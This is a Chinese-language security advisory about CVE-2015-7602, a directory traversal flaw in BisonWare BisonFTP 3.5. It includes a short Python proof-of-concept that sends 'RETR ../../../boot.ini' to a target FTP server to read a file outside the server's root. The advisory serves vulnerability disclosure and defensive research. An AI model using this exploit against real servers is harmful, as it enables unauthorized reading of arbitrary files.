首页 -> 安全研究

安全研究

安全漏洞
BisonWare BisonFTP信息泄露漏洞(CVE-2015-7602)

发布日期:2015-09-29
更新日期:2015-09-30

受影响系统:
BisonWare BisonFTP 3.5
描述:
CVE(CAN) ID: CVE-2015-7602

BisonFTP是一款FTP服务程序。

BisonWare BisonFTP 3.5版本存在目录遍历漏洞,远程攻击者通过RETR命令内的"../ ",利用此漏洞可读取任意文件。

<*来源:Jay Turla
  *>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Jay Turla ()提供了如下测试方法:

#!/usr/bin/python
# title: BisonWare BisonFTP server product V3.5 Directory Traversal Vulnerability
# author: Jay Turla <@shipcod3>
# tested on Windows XP Service Pack 3 - English
# software link: https://www.exploit-db.com/apps/081331edfc143738a60e029192b5986e-BisonFTPServer.rar
# description: BisonWare BisonFTP server product V3.5 is vulnerable to Directory Traversal (quick and dirty code just for PoC)

from ftplib import FTP

ftp = FTP(raw_input("Target IP: "))
ftp.login()                  
ftp.retrbinary('RETR ../../../boot.ini', open('boot.ini.txt', 'wb').write)
ftp.close()
file = open('boot.ini.txt', 'r')
print "[**] Printing what's inside boot.ini\n"
print "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"
print file.read()
print "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"

建议:
厂商补丁:

BisonWare
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://bisonware-ftp-server.software.informer.com/3.5/

浏览次数:2203
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障